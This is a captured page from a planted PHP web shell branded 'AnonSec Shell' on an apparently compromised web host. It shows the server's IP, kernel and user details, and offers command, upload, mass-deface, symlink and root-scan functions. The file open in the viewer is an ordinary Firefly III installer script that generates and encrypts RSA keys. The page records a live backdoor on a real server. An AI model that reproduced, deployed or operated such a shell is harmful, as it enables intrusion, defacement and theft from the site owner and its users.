AnonSec Shell
Server IP : 162.0.209.157  /  Your IP : 18.219.23.150   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux premium178.web-hosting.com 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
User : balaoqob ( 2395)
PHP Version : 8.0.30
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/var/softaculous/firefly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/self/root/var/softaculous/firefly/update_keys.php
<?php

global $key, $error;

$key = base64_decode('[[APP_KEY]]');

//Required to autoload the namespaces
require_once 'vendor/autoload.php';

use Ramsey\Uuid\Uuid;
use phpseclib3\Crypt\RSA;

$uuid5 = (string)Uuid::uuid5(Uuid::NAMESPACE_URL, 'firefly-iii.org');

//This is to generate public and private key pairs(of 4096 bits) using phpseclib's RSA class's createKey() function and store the keys in database

$keys = array();

$keys = RSA::createKey(4096);

$public_key = (string)$keys->getPublicKey();

$private_key = (string)$keys;

echo '<private_key>'.$private_key.'</private_key>';
echo '<public_key>'.$public_key.'</public_key>';

//Encrypting the keys
$uuid5_enc =  json_encode($uuid5);
$private_key_enc =  json_encode(__encrypt($private_key));
$public_key_enc =  json_encode(__encrypt($public_key));

echo '<installation_id>'.$uuid5_enc.'</installation_id>';
echo '<private_key_enc>'.$private_key_enc.'</private_key_enc>';
echo '<public_key_enc>'.$public_key_enc.'</public_key_enc>';

function __encrypt($value, $serialize = true)
{
	global $key, $error;
	$cipher = 'AES-256-CBC';
	//$this->cipher
	$iv = random_bytes(openssl_cipher_iv_length($cipher));

	// First we will encrypt the value using OpenSSL. After this is encrypted we
	// will proceed to calculating a MAC for the encrypted value so that this
	// value can be verified later as not having been changed by the users.
	$value = openssl_encrypt(
		$serialize ? serialize($value) : $value,
		$cipher, $key, 0, $iv
	);

	if ($value === false) {
		$error[] = 'Could not encrypt the data.';
	}

	// Once we get the encrypted value we'll go ahead and base64_encode the input
	// vector and create the MAC for the encrypted value so we can then verify
	// its authenticity. Then, we'll JSON the data into the "payload" array.
	$mac = __hash($iv = base64_encode($iv), $value);

	$json = json_encode(compact('iv', 'value', 'mac'));

	if (json_last_error() !== JSON_ERROR_NONE) {
		$error[] = 'Could not encrypt the data.';
	}

	return base64_encode($json);
}

function __hash($iv, $value)
{
	global $key;
	return hash_hmac('sha256', $iv.$value, $key);
}

@unlink('update_keys.php');

?>

Anon7 - 2022
AnonSec Team